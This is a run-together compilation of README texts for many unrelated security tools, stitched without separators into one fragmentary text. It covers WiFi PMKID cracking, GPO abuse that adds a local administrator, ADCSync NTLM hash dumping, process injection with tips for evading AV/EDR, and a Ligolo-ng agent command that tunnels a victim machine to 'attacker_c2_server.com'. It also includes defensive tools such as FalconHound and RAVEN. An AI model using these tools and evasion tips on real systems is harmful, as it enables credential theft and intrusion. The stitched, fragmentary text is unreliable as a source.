This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.
Obtaining the PMKID
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below
If access point is vulnerable, you should see the PMKID value like the below screenshot:
Demo Run
Disclaimer
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
Install
** You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
Description
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
The tool suite is three parts in GO:
Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.
Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
Usage
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File> -a Add this flag if you want to see all output including failures -c int How many goroutines running concurrently (default 100) -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" ) -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File> -c int How many goroutines running concurrently (default 100) -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE") -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)
RETR
retr [options] -all Return all the rows in the DB -cn string String to search for in common name column, returns like-results (default "NONE") -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -ip string String to search for in IP column, returns like-results (default "NONE") -num Return the Number of rows (results) in the DB (By IP) -org string String to search for in Organization column, returns like-results (default "NONE") -san string String to search for in common name column, returns like-results (default "NONE")
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
How to use
Basic usage
Add john user to local administrators group (Password: H4x00r123..)
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
Adding, removing or timing out sessions in the graph, based on logon and logoff events.
Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
Adding CVE information and whether there is a public exploit available to the graph.
All kinds of Azure activities.
Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
Adding new users, groups and computers to the graph.
Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and or targets:
Azure Sentinel
Azure Sentinel Watchlists
Splunk
Microsoft Defender for Endpoint
Neo4j
MS Graph API (early stage)
CSV files
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Installation
Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.
The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
Requirements
BloodHound, or at least the Neo4j database for now.
A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
Credentials for each endpoint you want to talk to, with the required permissions.
Configuration
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
Usage
Default run
To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.
./falconhound -go
List all enabled actions
To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.
./falconhound -actionlist -go
Run with a select set of actions
To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.
./falconhound -ids action1,action2,action3 -go
Run with a different config file
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
Run with a different actions folder
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
Action folder structure
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
Action files
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self explanatory,there are some important things to note about actions:
Enabled
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
Debug
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
Query
The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Targets
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.
- Name: Neo4j Enabled: true Query: | MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound' Parameters: Computer: Computer TargetUserSid: TargetUserSid Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
Sentinel
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is why also query output needs to be controlled, you might otherwise flood your target.
- Name: Sentinel Enabled: true
Sentinel Watchlists
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.
The SearchKey field is the column that will be used as the search key.
The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Splunk
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk Enabled: true
Azure Data Explorer
Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX Enabled: true Table: "name"
Extensions to the graph
Relationship: HadSession
Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
Properties
FalconHound will add the following properties to nodes in the graph:
Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids
Credential management
The currently supported ways of providing FalconHound with credentials are:
Via the config.yml file on disk.
Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
Mixed mode.
Config.yml
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.
The required permissions for your AppID/AppSecret are listed here.
Keyvault
A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
Once configured you can add the -keyvault parameter while starting FalconHound.
Mixed mode / fallback
When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
Deployment
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
Sharphound / Azurehound
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
License
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
Installation
git clone https://github.com/JPG0mez/adcsync.git cd adcsync pip3 install -r requirements.txt
Usage
To use this tool we need the following things:
Valid Domain Credentials
A user list from a bloodhound dump that will be passed in.
A template vulnerable to ESC1 (Found with Certipy find)
Options: -f, --file TEXT Input User List JSON file from Bloodhound [required] -o, --output TEXT NTLM Hash Output file [required] -ca TEXT Certificate Authority [required] -dc-ip TEXT IP Address of Domain Controller [required] -u, --user TEXT Username [required] -p, --password TEXT Password [required] -template TEXT Template Name vulnerable to ESC1 [required] -target-ip TEXT IP Address of th e target machine [required] --help Show this message and exit.
TODO
Support alternative authentication methods such as NTLM hashes and ccache files
Automatically run "certipy find" to find and grab templates vulnerable to ESC1
Add jitter and sleep options to avoid detection
Add type validation for all variables
Acknowledgements
puzzlepeaches: Telling me to hurry up and write this
The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.
The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.
Prerequisites
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
Windows
On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
Linux
The libkrb5-dev package needs to be installed prior to installing python requirements
All
Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool
pip install -r requirements.txt
Enumeration Mode
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.
Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
Example
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret! [=] Found 2 non Windows machines registered within AD [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS Mode
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.
Examples
Adding a DNS A record for host ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50 [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com [=] Adding A record for target ahost using data 192.168.128.50 [+] Applied 1 updates successfully
Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com. [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com [=] Adding PTR record for target 50 using data ahost.ad.ginge.com. [+] Applied 1 updates successfully
Forward and reverse DNS lookup results after execution
DllNotificationInection is a POC of a new βthreadlessβ process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
OPSEC Notes
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.
Acknowledgments
@C5pider for his ShellcodeTemplate project which which was used to create the trampoline shellcode. Also, for Havoc C2 that was used in the POC Demo Video.
Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.
Whats New?:
Uscrapper 2.0:
Introduced multiple modules to bypass anti-webscrapping techniques.
Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
Implemented Multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars: VAR_NAME: value ANOTHER_VAR: another_value # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
Inspiration of this project comes from Awesome taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
Legal
Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.
Requirements
This software only works on linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your chatgpt api key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
Create a file named βdomains.txtβ. Type in a line-separated list of domains youβd like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains youβd like to ignore. Regular expressions are supported.
Run antisquat using python3.8 antisquat.py domains.txt
Examples:
Letβs say youβd like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
Test case:
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
SYN are translated to connect() on remote
SYN-ACK is sent back if connect() succeed
RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go $ go build -o proxy cmd/proxy/main.go # Build for Windows $ GOOS=windows go build -o agent.exe cmd/agent/main.go $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo $ sudo ip link set ligolo up
Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans) ;
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear β the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat β an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality β each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --org-name ORG_NAME Organization name to download the workflows
options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --max-stars MAX_STARS Maximum number of stars for a repository --min-stars MIN_STARS Minimum number of stars for a repository, default : 1000
It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode
If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.
